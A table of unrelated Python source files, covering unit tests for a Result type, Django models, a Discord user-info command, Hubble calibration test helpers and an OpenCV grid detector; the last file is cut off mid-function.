| id | content |
|---|---|
115723
|
import pytest
from meiga import Result, Error
@pytest.mark.unit
def test_should_create_a_success_result_with_a_true_bool():
result = Result(success=True)
assert result.is_success
assert result.value is True
@pytest.mark.unit
def test_should_create_a_success_result_with_a_false_bool():
result = Result(success=False)
assert result.is_success
assert result.value is False
@pytest.mark.unit
def test_should_create_a_success_result_with_a_none_value():
result = Result(success=None)
assert result.is_success
assert result.value is None
@pytest.mark.unit
def test_should_create_a_failure_result_with_a_generic_error():
result = Result(failure=Error())
assert result.is_failure
assert isinstance(result.value, Error)
@pytest.mark.unit
def test_should_create_a_failure_result_with_any_error():
class AnyError(Error):
pass
result = Result(failure=AnyError())
assert result.is_failure
assert isinstance(result.value, AnyError)
assert issubclass(result.value.__class__, Error)
@pytest.mark.unit
def test_should_raise_a_type_error_when_result_is_constructed_with_success_and_failure_at_the_same_time():
with pytest.raises(TypeError) as excinfo:
_ = Result(success="Success", failure="Failure")
assert (
"Result is a monad, it cannot be success and failure at the same time."
in str(excinfo.value)
)
@pytest.mark.unit
def test_should_raise_a_type_error_when_result_is_constructed_without_any_success_or_failure_value():
with pytest.raises(TypeError) as excinfo:
_ = Result()
assert "Result is a monad, it must be a success or a failure." in str(
excinfo.value
)
@pytest.mark.unit
def test_should_repr_a_success_result():
result = Result(success=2)
assert "Result[status: success | value: 2]" == result.__repr__()
@pytest.mark.unit
def test_should_repr_a_failure_result():
result = Result(failure=Error())
assert "Result[status: failure | value: Error]" == result.__repr__()
@pytest.mark.unit
def test_should_eq_two_equal_success_result():
result_1 = Result(success=2)
result_2 = Result(success=2)
assert result_1 == result_2
@pytest.mark.unit
def test_should_eq_two_different_success_result():
result_1 = Result(success=2)
result_2 = Result(success=3)
assert result_1 != result_2
@pytest.mark.unit
def test_should_eq_two_equal_failure_result():
result_1 = Result(failure=Error())
result_2 = Result(failure=Error())
assert result_1 == result_2
@pytest.mark.unit
def test_should_eq_two_different_failure_result():
result_1 = Result(failure=Error())
result_2 = Result(failure=Exception())
assert result_1 != result_2
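

# --- Illustrative addition (not from the original suite): the same Result API
# exercised through a small helper, using only the constructors and accessors
# shown in the tests above.
@pytest.mark.unit
def test_should_wrap_a_division_in_a_result():
    def safe_divide(a, b):
        if b == 0:
            return Result(failure=Error())
        return Result(success=a / b)
    assert safe_divide(4, 2).is_success
    assert safe_divide(4, 2).value == 2
    assert safe_divide(4, 0).is_failure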
|
115755
|
from .rule import Rule
from abc import ABC, abstractmethod
class CSVRule(Rule, ABC):
    '''el_id can be either the id of a node or of a resource'''
def __init__(self, name_in_csv, el_id):
self.id = el_id
self.name_in_csv = name_in_csv
super().__init__()
def get_name_in_csv(self):
return self.name_in_csv
def get_id(self):
return self.id
@abstractmethod
def check(self, patient):
pass
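

# --- Hypothetical concrete rule (illustration only): assumes `patient` is a
# dict-like record keyed by CSV column name; the real patient interface is
# defined elsewhere in the project.
class NonEmptyCSVRule(CSVRule):
    '''Passes when the patient record has a non-empty value for this column.'''
    def check(self, patient):
        return bool(patient.get(self.get_name_in_csv()))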
|
115770
|
import time
from tkinter import *
from collections import deque
user_command_root = Tk()
user_command_root.title("TP3DS User Command")
user_command_root.geometry('350x640')
user_command_root.configure(background='black')
user_command_root.resizable(width=FALSE, height=FALSE)
text_font = ("", "20")
command_window_height_lines = 20
username_width_chars = 18
command_width_chars = 200
text_username = Text(user_command_root, height=command_window_height_lines, width=username_width_chars, background = "black", foreground = "white", font = text_font)
text_username.pack()
text_username.place(x=0, y=0)
text_commands = Text(user_command_root, height=command_window_height_lines, width=command_width_chars, background = "black", foreground = "white", font = text_font)
text_commands.pack()
text_commands.place(x=250, y=0)
command_print_queue = deque()
username_print_queue = deque()
color_print_queue = deque()
def make_tag(line_number, position):
return str(line_number) + "." + str(position)
def replace_arrows(cmd):
return cmd.replace("up", "β").replace("down", "β").replace("left", "β").replace("right", "β")
def print_command_list(command_printer_in, command_length, offset):
chat_username = command_printer_in[0]
command_list = command_printer_in[1]
command_color = command_printer_in[2]
if len(command_list) == 0 or len(chat_username) == 0:
return
user_command = ""
for item in command_list:
user_command += item
user_command = replace_arrows(user_command)
username_print_queue.append(chat_username[:21].capitalize())
if(len(username_print_queue) > command_length - offset):
username_print_queue.popleft()
command_print_queue.append(user_command[:12])
if(len(command_print_queue) > command_length - offset):
command_print_queue.popleft()
color_print_queue.append(command_color)
if(len(color_print_queue) > command_length - offset):
color_print_queue.popleft()
text_commands.delete(1.0, END)
for item in command_print_queue:
text_commands.insert(END, item.upper() + '\n')
text_commands.tag_add("command", "1.0", END)
text_commands.tag_config("command", background="black", foreground="white", justify = LEFT)
text_username.delete(1.0, END)
for index, i in enumerate(username_print_queue):
text_username.insert(END, username_print_queue[index] + "\n")
for index, i in enumerate(color_print_queue):
tag_name = "username" + str(index)
tag_start = make_tag(index+1, 0)
tag_end = make_tag(index+1, len(username_print_queue[index]))
text_username.tag_add(tag_name, tag_start, tag_end)
text_username.tag_config(tag_name, background="black", foreground=color_print_queue[index])
# count = 0
# while 1:
# command_printer_in = []
# command_printer_in.append(str(count))
# command_printer_in.append(['down', 'left', "up", 'right'])
# command_printer_in.append('white')
# print(command_printer_in)
# time.sleep(0.1)
# print_command_list(command_printer_in, 20, 0)
# user_command_root.update()
# count += 1
|
115772
|
from objects.modulebase import ModuleBase
from objects.permissions import PermissionEmbedLinks, PermissionExternalEmojis
from utils.funcs import find_user, _get_last_user_message_timestamp
from datetime import datetime
import discord
STATUS_EMOTES = {
'online': '<:online:427209268240973854>',
'idle': '<:idle:427209268203094017>',
'dnd': '<:dnd:427209268043841537>',
'offline': '<:offline:427209267687194625>',
'invisible': '<:invisible:427209267687194625>'
}
ACTIVITY_MAP = {
discord.ActivityType.unknown: '',
discord.ActivityType.playing: 'Playing: ',
discord.ActivityType.streaming: 'Streaming: ',
discord.ActivityType.listening: 'Listening: ',
discord.ActivityType.watching: 'Watching: ',
discord.ActivityType.custom: '',
}
class Module(ModuleBase):
usage_doc = '{prefix}{aliases} [user]'
short_doc = 'Get information about given user'
name = 'user'
aliases = (name, 'userinfo')
category = 'Discord'
bot_perms = (PermissionEmbedLinks(), )
async def on_call(self, ctx, args, **flags):
if len(args) == 1:
user = ctx.author
else:
user = await find_user(args[1:], ctx.message)
if user is None:
return await ctx.warn('User not found')
e = discord.Embed(
title=str(user),
url=str(user.avatar_url),
colour=discord.Colour.gold()
)
e.set_thumbnail(url=user.avatar_url)
e.add_field(
name='registered', inline=False,
value=f'`{user.created_at.replace(microsecond=0)}` ({(datetime.now() - user.created_at).days} days ago)'
)
if isinstance(user, discord.Member):
# function can return members from different guild
if user.guild == ctx.guild:
e.title += ' (member)'
e.add_field(
name='member since', inline=False,
value=f'`{user.joined_at.replace(microsecond=0)}` ({(datetime.now() - user.joined_at).days} days)'
)
last_msg_ts = _get_last_user_message_timestamp(user.id, ctx.channel.id)
if last_msg_ts != datetime.fromtimestamp(0):
last_msg_ts = last_msg_ts.replace(microsecond=0)
e.add_field(
name='last message sent', inline=False,
value=f'`{last_msg_ts}`'
)
e.add_field(name='top role', value=user.top_role.mention)
e.add_field(name='total roles', value=len(user.roles))
if user.nick is not None:
e.add_field(name='nick', value=user.nick, inline=False)
external_emoji_perm = PermissionExternalEmojis().check(ctx.channel, self.bot.user)
activity = user.activity
if activity is None:
e.add_field(
name='status',
value=(STATUS_EMOTES[str(user.status)] if external_emoji_perm else '') + str(user.status)
)
else:
activity_state = ACTIVITY_MAP.get(activity.type, '')
emoji = ''
# thanks discord.py
if getattr(activity, 'emoji', None):
# activity has emoji
if activity.emoji.id:
# emoji is custom
if self.bot.get_emoji(activity.emoji.id):
# bot has access to emoji
emoji = activity.emoji
else:
                            # bot has no access to emoji
emoji = '\N{THINKING FACE}'
else:
# emoji is standard
emoji = activity.emoji
activity_name = f'{emoji} {activity.name if activity.name else ""}'
e.add_field(
name='activity',
value=(STATUS_EMOTES[str(user.status)] if external_emoji_perm else '') + f'{activity_state}{activity_name}'
)
e.add_field(name='robot', value='yes' if user.bot else 'no')
e.set_footer(text=user.id)
await ctx.send(embed=e)
|
115777
|
from django.conf import settings
from django_rq.management.commands.rqworker import Command as C
class Command(C):
"""
Subclass django_rq's built-in rqworker to listen on all configured queues if none
are specified (instead of only the 'default' queue).
"""
def handle(self, *args, **options):
if len(args) < 1:
args = settings.RQ_QUEUES
super().handle(*args, **options)
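
# Hypothetical invocations (queue names depend on settings.RQ_QUEUES):
#   python manage.py rqworker            -> listens on every configured queue
#   python manage.py rqworker high low   -> stock behaviour: only the named queues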
|
115800
|
import os
from django.conf import settings
from django.db import models
from django.utils import timezone
from datetime import datetime, timedelta
from uuid import uuid4
def get_image_path(instance, filename):
ymd_path = datetime.now().strftime('%Y/%m/%d')
uuid_name = uuid4().hex
    return '/'.join(['image_file', ymd_path, uuid_name])
class Anonymous(models.Model):
    writer = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, null=True, verbose_name='author')
    title = models.CharField(max_length=128, verbose_name='title')
    content = models.TextField(verbose_name='content')
    likes = models.ManyToManyField(settings.AUTH_USER_MODEL, related_name='likes', verbose_name='liked by', blank=True)
    comments = models.PositiveIntegerField(verbose_name='comment count', default=0)
    image_files = models.ImageField(upload_to=get_image_path, null=True, blank=True, verbose_name='image file')
    filename = models.CharField(max_length=64, null=True, verbose_name='attached image filename')
    registered_date = models.DateTimeField(auto_now_add=True, verbose_name='registered at')
def __str__(self):
return self.title
def delete(self, *args, **kargs):
if self.image_files:
            # FieldFile.path is already an absolute filesystem path
            os.remove(self.image_files.path)
super(Anonymous, self).delete(*args, **kargs)
@property
def like_count(self):
return self.likes.count()
@property
def created_string(self):
time = datetime.now(tz=timezone.utc) - self.registered_date
        if time < timedelta(minutes=1):
            return 'just now'
        elif time < timedelta(hours=1):
            return str(int(time.seconds / 60)) + ' minutes ago'
        elif time < timedelta(days=1):
            return str(int(time.seconds / 3600)) + ' hours ago'
        elif time < timedelta(days=7):
            time = datetime.now(tz=timezone.utc).date() - self.registered_date.date()
            return str(time.days) + ' days ago'
        else:
            return False
    class Meta:
        db_table = 'anonymous_board'
        verbose_name = 'anonymous board'
        verbose_name_plural = 'anonymous boards'
class AnonymousComment(models.Model):
    post = models.ForeignKey(Anonymous, on_delete=models.CASCADE, verbose_name='post')
    writer = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, null=True, verbose_name='comment author')
    content = models.TextField(verbose_name='comment content')
    created = models.DateTimeField(auto_now_add=True, verbose_name='created at')
    deleted = models.BooleanField(default=False, verbose_name='deleted')
    reply = models.IntegerField(verbose_name='reply position', default=0)
def __str__(self):
return self.content
@property
def created_string(self):
time = datetime.now(tz=timezone.utc) - self.created
        if time < timedelta(minutes=1):
            return 'just now'
        elif time < timedelta(hours=1):
            return str(int(time.seconds / 60)) + ' minutes ago'
        elif time < timedelta(days=1):
            return str(int(time.seconds / 3600)) + ' hours ago'
        elif time < timedelta(days=7):
            time = datetime.now(tz=timezone.utc).date() - self.created.date()
            return str(time.days) + ' days ago'
        else:
            return False
    class Meta:
        db_table = 'anonymous_board_comment'
        verbose_name = 'anonymous board comment'
        verbose_name_plural = 'anonymous board comments'
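
# --- Illustrative usage sketch (assumes `user` is an existing AUTH_USER_MODEL
# instance; shown as comments because it needs a configured Django project):
# post = Anonymous.objects.create(writer=user, title='hello', content='world')
# post.likes.add(user)
# post.like_count       # -> 1
# post.created_string   # -> 'just now'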
|
115823
|
import getpass
import os
import sys
import math
from io import StringIO
import shutil
import datetime
from os.path import splitext
from difflib import unified_diff
import pytest
from astropy.io import fits
from astropy.io.fits import FITSDiff
from astropy.utils.data import conf
import numpy as np
import stwcs
from stsci.tools import fileutil
from ci_watson.artifactory_helpers import get_bigdata, generate_upload_schema
from ci_watson.hst_helpers import download_crds, ref_from_image
# Base classes for actual tests.
# NOTE: Named in a way so pytest will not pick them up here.
@pytest.mark.bigdata
class BaseCal:
prevdir = os.getcwd()
use_ftp_crds = True
timeout = 30 # seconds
tree = 'dev'
# Numpy default for allclose comparison
rtol = 1e-6
atol = 1e-5
# To be defined by instrument
refstr = ''
prevref = ''
input_loc = ''
ref_loc = ''
ignore_keywords = []
# To be defined by individual test
subdir = ''
@pytest.fixture(autouse=True)
def setup_class(self, tmpdir, envopt, pytestconfig):
"""
Run test in own dir so we can keep results separate from
other tests.
"""
if not tmpdir.ensure(self.subdir, dir=True):
p = tmpdir.mkdir(self.subdir).strpath
else:
p = tmpdir.join(self.subdir).strpath
os.chdir(p)
# NOTE: This could be explicitly controlled using pytest fixture
# but too many ways to do the same thing would be confusing.
# Refine this logic if using pytest fixture.
# HSTCAL cannot open remote CRDS on FTP but central storage is okay.
# So use central storage if available to avoid FTP.
if self.prevref is None or self.prevref.startswith(('ftp', 'http')):
os.environ[self.refstr] = p + os.sep
self.use_ftp_crds = True
# Turn off Astrometry updates
os.environ['ASTROMETRY_STEP_CONTROL'] = 'OFF'
# This controls astropy.io.fits timeout
conf.remote_timeout = self.timeout
# Update tree to point to correct environment
self.tree = envopt
# Collect pytest configuration values specified in setup.cfg or pytest.ini
self.inputs_root = pytestconfig.getini('inputs_root')[0]
self.results_root = pytestconfig.getini('results_root')[0]
def teardown_class(self):
"""Reset path and variables."""
conf.reset('remote_timeout')
os.chdir(self.prevdir)
if self.use_ftp_crds and self.prevref is not None:
os.environ[self.refstr] = self.prevref
def get_data(self, *args):
"""
Download `filename` into working directory using
`get_bigdata`. This will then return the full path to
the local copy of the file.
"""
local_file = get_bigdata(self.inputs_root, self.tree, self.input_loc, *args)
return local_file
def get_input_file(self, *args, refsep='$'):
"""
Download or copy input file (e.g., RAW) into the working directory.
The associated CRDS reference files in ``refstr`` are also
downloaded, if necessary.
"""
filename = self.get_data(*args)
ref_files = ref_from_image(filename, ['IDCTAB', 'OFFTAB', 'NPOLFILE', 'D2IMFILE', 'DGEOFILE'])
print("Looking for REF_FILES: {}".format(ref_files))
for ref_file in ref_files:
if ref_file.strip() == '':
continue
if refsep not in ref_file: # Local file
refname = self.get_data('customRef', ref_file)
else: # Download from FTP, if applicable
refname = os.path.join(ref_file)
if self.use_ftp_crds:
download_crds(refname, self.timeout)
return filename
def compare_outputs(self, outputs, raise_error=True):
"""
Compare output with "truth" using appropriate
diff routine; namely,
``fitsdiff`` for FITS file comparisons
``unified_diff`` for ASCII products.
Parameters
----------
outputs : list of tuple
A list of tuples, each containing filename (without path)
of CALXXX output and truth, in that order.
raise_error : bool
Raise ``AssertionError`` if difference is found.
Returns
-------
report : str
Report from ``fitsdiff``.
This is part of error message if ``raise_error=True``.
"""
all_okay = True
creature_report = ''
# Create instructions for uploading results to artifactory for use
# as new comparison/truth files
testpath, testname = os.path.split(os.path.abspath(os.curdir))
# organize results by day test was run...could replace with git-hash
whoami = getpass.getuser() or 'nobody'
dt = datetime.datetime.now().strftime("%d%b%YT")
ttime = datetime.datetime.now().strftime("%H_%M_%S")
user_tag = 'NOT_CI_{}_{}'.format(whoami, ttime)
build_tag = os.environ.get('BUILD_TAG', user_tag)
build_suffix = os.environ.get('BUILD_MATRIX_SUFFIX', 'standalone')
testdir = "{}_{}_{}".format(testname, build_tag, build_suffix)
tree = os.path.join(self.results_root, self.input_loc,
dt, testdir) + os.sep
updated_outputs = []
for actual, desired in outputs:
# Get "truth" image
s = self.get_data('truth', desired)
if s is not None:
desired = s
if actual.endswith('fits'):
# Working with FITS files...
fdiff = FITSDiff(actual, desired, rtol=self.rtol, atol=self.atol,
ignore_keywords=self.ignore_keywords)
creature_report += fdiff.report()
if not fdiff.identical:
# Only keep track of failed results which need to
# be used to replace the truth files (if OK).
updated_outputs.append((actual, desired))
if not fdiff.identical and all_okay:
all_okay = False
else:
# Try ASCII-based diff
with open(actual) as afile:
actual_lines = afile.readlines()
with open(desired) as dfile:
desired_lines = dfile.readlines()
udiff = unified_diff(actual_lines, desired_lines,
fromfile=actual, tofile=desired)
old_stdout = sys.stdout
udiffIO = StringIO()
sys.stdout = udiffIO
sys.stdout.writelines(udiff)
sys.stdout = old_stdout
udiff_report = udiffIO.getvalue()
creature_report += udiff_report
if len(udiff_report) > 2 and all_okay:
all_okay = False
if len(udiff_report) > 2:
# Only keep track of failed results which need to
# be used to replace the truth files (if OK).
updated_outputs.append((actual, desired))
if not all_okay:
# Write out JSON file to enable retention of different results
new_truths = [os.path.abspath(i[1]) for i in updated_outputs]
for files in updated_outputs:
print("Renaming {} as new 'truth' file: {}".format(
files[0], files[1]))
shutil.move(files[0], files[1])
log_pattern = [os.path.join(os.path.dirname(x), '*.log') for x in new_truths]
generate_upload_schema(pattern=new_truths + log_pattern,
testname=testname,
                               target=tree)
if not all_okay and raise_error:
raise AssertionError(os.linesep + creature_report)
return creature_report
class BaseACS(BaseCal):
refstr = 'jref'
prevref = os.environ.get(refstr)
input_loc = 'acs'
ref_loc = 'acs'
ignore_keywords = ['origin', 'filename', 'date', 'iraf-tlm', 'fitsdate',
'upwtim', 'wcscdate', 'upwcsver', 'pywcsver',
'history', 'prod_ver', 'rulefile']
class BaseACSHRC(BaseACS):
input_loc = 'acs/hrc'
ref_loc = 'acs/hrc/ref'
class BaseACSWFC(BaseACS):
input_loc = 'acs/wfc'
ref_loc = 'acs/wfc/ref'
class BaseWFC3(BaseCal):
refstr = 'iref'
input_loc = 'wfc3'
ref_loc = 'wfc3/ref'
prevref = os.environ.get(refstr)
ignore_keywords = ['origin', 'filename', 'date', 'iraf-tlm', 'fitsdate',
'upwtim', 'wcscdate', 'upwcsver', 'pywcsver',
'history', 'prod_ver', 'rulefile']
class BaseSTIS(BaseCal):
refstr = 'oref'
prevref = os.environ.get(refstr)
input_loc = 'stis'
ref_loc = 'stis/ref'
ignore_keywords = ['origin', 'filename', 'date', 'iraf-tlm', 'fitsdate',
'upwtim', 'wcscdate', 'upwcsver', 'pywcsver',
'history', 'prod_ver', 'rulefile']
class BaseWFPC2(BaseCal):
refstr = 'uref'
prevref = os.environ.get(refstr)
input_loc = 'wfpc2'
ref_loc = 'wfpc2/ref'
ignore_keywords = ['origin', 'filename', 'date', 'iraf-tlm', 'fitsdate',
'upwtim', 'wcscdate', 'upwcsver', 'pywcsver',
'history', 'prod_ver', 'rulefile']
def centroid_compare(centroid):
return centroid[1]
class BaseUnit(BaseCal):
buff = 0
refstr = 'jref'
prevref = os.environ.get(refstr)
input_loc = 'acs'
ref_loc = 'acs'
ignore_keywords = ['origin', 'filename', 'date', 'iraf-tlm', 'fitsdate',
'upwtim', 'wcscdate', 'upwcsver', 'pywcsver',
'history', 'prod_ver', 'rulefile']
atol = 1.0e-5
def bound_image(self, image):
"""
Compute region where image is non-zero
"""
coords = np.nonzero(image)
ymin = coords[0].min()
ymax = coords[0].max()
xmin = coords[1].min()
xmax = coords[1].max()
return (ymin, ymax, xmin, xmax)
def centroid(self, image, size, center):
"""
Compute the centroid of a rectangular area
"""
ylo = int(center[0]) - size // 2
yhi = min(ylo + size, image.shape[0])
xlo = int(center[1]) - size // 2
xhi = min(xlo + size, image.shape[1])
center = [0.0, 0.0, 0.0]
for y in range(ylo, yhi):
for x in range(xlo, xhi):
center[0] += y * image[y,x]
center[1] += x * image[y,x]
center[2] += image[y,x]
if center[2] == 0.0: return None
center[0] /= center[2]
center[1] /= center[2]
return center
def centroid_close(self, list_of_centroids, size, point):
"""
Find if any centroid is close to a point
"""
for i in range(len(list_of_centroids)-1, -1, -1):
if (abs(list_of_centroids[i][0] - point[0]) < size / 2 and
abs(list_of_centroids[i][1] - point[1]) < size / 2):
return 1
return 0
def centroid_distances(self, image1, image2, amp, size):
"""
Compute a list of centroids and the distances between them in two images
"""
distances = []
list_of_centroids, lst_pts = self.centroid_list(image2, amp, size)
for center2, pt in zip(list_of_centroids, lst_pts):
center1 = self.centroid(image1, size, pt)
if center1 is None: continue
disty = center2[0] - center1[0]
distx = center2[1] - center1[1]
dist = math.sqrt(disty * disty + distx * distx)
dflux = abs(center2[2] - center1[2])
distances.append([dist, dflux, center1, center2])
distances.sort(key=centroid_compare)
return distances
def centroid_list(self, image, amp, size):
"""
Find the next centroid
"""
list_of_centroids = []
list_of_points = []
points = np.transpose(np.nonzero(image > amp))
for point in points:
if not self.centroid_close(list_of_centroids, size, point):
center = self.centroid(image, size, point)
list_of_centroids.append(center)
list_of_points.append(point)
return list_of_centroids, list_of_points
def centroid_statistics(self, title, fname, image1, image2, amp, size):
"""
write centroid statistics to compare differences btw two images
"""
stats = ("minimum", "median", "maximum")
images = (None, None, image1, image2)
im_type = ("", "", "test", "reference")
diff = []
distances = self.centroid_distances(image1, image2, amp, size)
indexes = (0, len(distances)//2, len(distances)-1)
fd = open(fname, 'w')
fd.write("*** %s ***\n" % title)
if len(distances) == 0:
diff = [0.0, 0.0, 0.0]
fd.write("No matches!!\n")
elif len(distances) == 1:
diff = [distances[0][0], distances[0][0], distances[0][0]]
fd.write("1 match\n")
fd.write("distance = %f flux difference = %f\n" % (distances[0][0], distances[0][1]))
for j in range(2, 4):
ylo = int(distances[0][j][0]) - (1+self.buff)
yhi = int(distances[0][j][0]) + (2+self.buff)
xlo = int(distances[0][j][1]) - (1+self.buff)
xhi = int(distances[0][j][1]) + (2+self.buff)
subimage = images[j][ylo:yhi,xlo:xhi]
fd.write("\n%s image centroid = (%f,%f) image flux = %f\n" %
(im_type[j], distances[0][j][0], distances[0][j][1], distances[0][j][2]))
fd.write(str(subimage) + "\n")
else:
fd.write("%d matches\n" % len(distances))
for k in range(0,3):
i = indexes[k]
diff.append(distances[i][0])
fd.write("\n%s distance = %f flux difference = %f\n" % (stats[k], distances[i][0], distances[i][1]))
for j in range(2, 4):
ylo = int(distances[i][j][0]) - (1+self.buff)
yhi = int(distances[i][j][0]) + (2+self.buff)
xlo = int(distances[i][j][1]) - (1+self.buff)
xhi = int(distances[i][j][1]) + (2+self.buff)
subimage = images[j][ylo:yhi,xlo:xhi]
fd.write("\n%s %s image centroid = (%f,%f) image flux = %f\n" %
(stats[k], im_type[j], distances[i][j][0], distances[i][j][1], distances[i][j][2]))
fd.write(str(subimage) + "\n")
fd.close()
return tuple(diff)
def make_point_image(self, input_image, point, value):
"""
Create an image with a single point set
"""
output_image = np.zeros(input_image.shape, dtype=input_image.dtype)
output_image[point] = value
return output_image
def make_grid_image(self, input_image, spacing, value):
"""
Create an image with points on a grid set
"""
output_image = np.zeros(input_image.shape, dtype=input_image.dtype)
shape = output_image.shape
for y in range(spacing//2, shape[0], spacing):
for x in range(spacing//2, shape[1], spacing):
output_image[y,x] = value
return output_image
def print_wcs(self, title, wcs):
"""
Print the wcs header cards
"""
print("=== %s ===" % title)
print(wcs.to_header_string())
def read_image(self, filename):
"""
Read the image from a fits file
"""
hdu = fits.open(filename)
image = hdu[1].data
hdu.close()
return image
def read_wcs(self, filename):
"""
Read the wcs of a fits file
"""
hdu = fits.open(filename)
wcs = stwcs.wcsutil.HSTWCS(hdu, 1)
hdu.close()
return wcs
def write_wcs(self, hdu, image_wcs):
"""
Update header with WCS keywords
"""
hdu.header['ORIENTAT'] = image_wcs.orientat
hdu.header['CD1_1'] = image_wcs.wcs.cd[0][0]
hdu.header['CD1_2'] = image_wcs.wcs.cd[0][1]
hdu.header['CD2_1'] = image_wcs.wcs.cd[1][0]
hdu.header['CD2_2'] = image_wcs.wcs.cd[1][1]
hdu.header['CRVAL1'] = image_wcs.wcs.crval[0]
hdu.header['CRVAL2'] = image_wcs.wcs.crval[1]
hdu.header['CRPIX1'] = image_wcs.wcs.crpix[0]
hdu.header['CRPIX2'] = image_wcs.wcs.crpix[1]
hdu.header['CTYPE1'] = image_wcs.wcs.ctype[0]
hdu.header['CTYPE2'] = image_wcs.wcs.ctype[1]
hdu.header['VAFACTOR'] = 1.0
def write_image(self, filename, wcs, *args):
"""
        Write an image to a FITS file
"""
extarray = ['SCI', 'WHT', 'CTX']
pimg = fits.HDUList()
phdu = fits.PrimaryHDU()
phdu.header['NDRIZIM'] = 1
phdu.header['ROOTNAME'] = filename
pimg.append(phdu)
for img in args:
# Create a MEF file with the specified extname
extn = extarray.pop(0)
extname = fileutil.parseExtn(extn)
ehdu = fits.ImageHDU(data=img)
ehdu.header['EXTNAME'] = extname[0]
ehdu.header['EXTVER'] = extname[1]
self.write_wcs(ehdu, wcs)
pimg.append(ehdu)
pimg.writeto(filename)
del pimg
def add_suffix(fname, suffix, range=None):
"""Add suffix to file name
Parameters
----------
fname: str
The file name to add the suffix to
suffix: str
The suffix to add_suffix
range: range
If specified, the set of indexes will be added to the
outputs.
Returns
-------
fname, fname_with_suffix
2-tuple of the original file name and name with suffix.
If `range` is defined, `fname_with_suffix` will be a list.
"""
fname_root, fname_ext = splitext(fname)
if range is None:
with_suffix = ''.join([
fname_root,
'_',
suffix,
fname_ext
])
else:
with_suffix = []
for idx in range:
with_suffix.append(''.join([
fname_root,
'_',
str(idx),
'_',
suffix,
fname_ext
]))
return fname, with_suffix
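
# Illustrative expectations (derived from the logic above):
#   add_suffix('image.fits', 'new')           -> ('image.fits', 'image_new.fits')
#   add_suffix('image.fits', 'new', range(2)) -> ('image.fits',
#                                                 ['image_0_new.fits', 'image_1_new.fits'])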
|
115825
|
import cv2
from settings import *
from src.solving_objects.MyHoughLines import *
from src.solving_objects.MyHoughPLines import *
def line_intersection(my_line1, my_line2):
line1 = [[my_line1[0], my_line1[1]], [my_line1[2], my_line1[3]]]
line2 = [[my_line2[0], my_line2[1]], [my_line2[2], my_line2[3]]]
xdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])
ydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1])
def det(a, b):
return a[0] * b[1] - a[1] * b[0]
div = det(xdiff, ydiff)
if div == 0:
raise Exception('lines do not intersect')
d = (det(*line1), det(*line2))
x = det(d, xdiff) / div
y = det(d, ydiff) / div
return [int(x), int(y)]
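
# Worked example: the two diagonals of the square (0,0)-(2,2) and (0,2)-(2,0)
# cross at the centre:
#   line_intersection([0, 0, 2, 2], [0, 2, 2, 0]) -> [1, 1]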
def look_for_intersections_hough(lines):
hor_up = (1000, 1000, 1000, 1000) # x1,y1,x2,y2
hor_down = (0, 0, 0, 0) # x1,y1,x2,y2
ver_left = (1000, 1000, 1000, 1000) # x1,y1,x2,y2
ver_right = (0, 0, 0, 0) # x1,y1,x2,y2
for line in [line for line in lines if not line.isMerged]:
lim = line.get_limits()
if line.theta < np.pi / 4: # Ligne Verticale
if lim[0] + lim[2] < ver_left[0] + ver_left[2]:
ver_left = lim
elif lim[0] + lim[2] > ver_right[0] + ver_right[2]:
ver_right = lim
else:
if lim[1] + lim[3] < hor_up[1] + hor_up[3]:
hor_up = lim
elif lim[1] + lim[3] > hor_down[1] + hor_down[3]:
hor_down = lim
# raw_limits_lines = [hor_up, hor_down, ver_left, ver_right]
grid_limits = list()
grid_limits.append(line_intersection(hor_up, ver_left))
grid_limits.append(line_intersection(hor_up, ver_right))
grid_limits.append(line_intersection(hor_down, ver_right))
grid_limits.append(line_intersection(hor_down, ver_left))
return grid_limits
def find_corners(contour):
top_left = [10000, 10000]
top_right = [0, 10000]
bottom_right = [0, 0]
bottom_left = [10000, 0]
# contour_x = sorted(contour,key = lambda c:c[0][0])
# contour_y = sorted(contour,key = lambda c:c[0][1])
mean_x = np.mean(contour[:, :, 0])
mean_y = np.mean(contour[:, :, 1])
for j in range(len(contour)):
x, y = contour[j][0]
if x > mean_x: # On right
if y > mean_y: # On bottom
bottom_right = [x, y]
else:
top_right = [x, y]
else:
if y > mean_y: # On bottom
bottom_left = [x, y]
else:
top_left = [x, y]
return [top_left, top_right, bottom_right, bottom_left]
def get_hough_transform(img, edges, display=False):
my_lines = []
img_after_merge = img.copy()
lines_raw = cv2.HoughLines(edges, 1, np.pi / 180, thresh_hough)
for line in lines_raw:
my_lines.append(MyHoughLines(line))
if display:
for line in my_lines:
x1, y1, x2, y2 = line.get_limits()
cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)
merge_lines(my_lines)
grid_limits = look_for_intersections_hough(my_lines)
if display:
for line in [line for line in my_lines if not line.isMerged]:
x1, y1, x2, y2 = line.get_limits()
cv2.line(img_after_merge, (x1, y1), (x2, y2), (255, 0, 0), 2)
for point in grid_limits:
x, y = point
cv2.circle(img_after_merge, (x, y), 10, (255, 0, 0), 3)
if not display:
return grid_limits
else:
return grid_limits, img, img_after_merge
class GridDetector:
def __init__(self, display=False):
self.__display = display
def extract_grids(self, frame):
# Get a threshed image which emphasize lines
threshed_img = self.thresh_img(frame)
# Look for grids corners
grids_corners_list = self.look_for_grids_corners(threshed_img)
# Use grids corners to unwrap img !
unwraped_grid_list, transfo_matrix = self.unwrap_grids(frame, grids_corners_list)
return unwraped_grid_list, grids_corners_list, transfo_matrix
@staticmethod
def thresh_img(frame):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray_enhance = (gray - gray.min()) * int(255 / (gray.max() - gray.min()))
blurred = cv2.GaussianBlur(gray_enhance, (5, 5), 0)
thresh = cv2.adaptiveThreshold(blurred, 255,
cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY,
block_size_big, mean_sub_big)
thresh_not = cv2.bitwise_not(thresh)
kernel_close = np.ones((5, 5), np.uint8)
closing = cv2.morphologyEx(thresh_not, cv2.MORPH_CLOSE, kernel_close) # Delete space between line
dilate = cv2.morphologyEx(closing, cv2.MORPH_DILATE, kernel_close) # Delete space between line
return dilate
@staticmethod
def unwrap_grids(frame, points_grids):
undistorted_grids = []
transfo_matrix_list = []
for points_grid in points_grids:
final_pts = np.array(
[[0, 0], [target_w_grid - 1, 0],
[target_w_grid - 1, target_h_grid - 1], [0, target_h_grid - 1]],
dtype=np.float32)
